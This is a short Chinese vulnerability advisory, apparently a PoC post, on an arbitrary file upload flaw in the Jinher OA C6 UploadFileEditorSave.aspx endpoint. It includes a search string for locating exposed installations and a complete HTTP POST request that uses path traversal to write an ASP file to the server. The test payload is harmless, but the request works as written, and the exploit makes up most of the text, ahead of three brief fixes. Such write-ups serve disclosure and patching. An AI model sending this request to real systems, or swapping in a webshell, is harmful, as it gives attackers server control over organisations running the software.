金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。
金和 OA C6 uploadfileeditorsave接口处存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
app=“Jinher-OA”
POC如下:
POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\ilra9c2tw2.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 187
Content-Type: multipart/form-data; boundary=----umvtqrw8etdtcatpd8vq
Accept-Encoding: gzip, deflate, br
------umvtqrw8etdtcatpd8vq
Content-Disposition: form-data; name="file"; filename="ilra9c2tw2.jpg"
Content-Type: image/png
<% response.write(333*2)%>
------umvtqrw8etdtcatpd8vq--
访问上传文件
1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。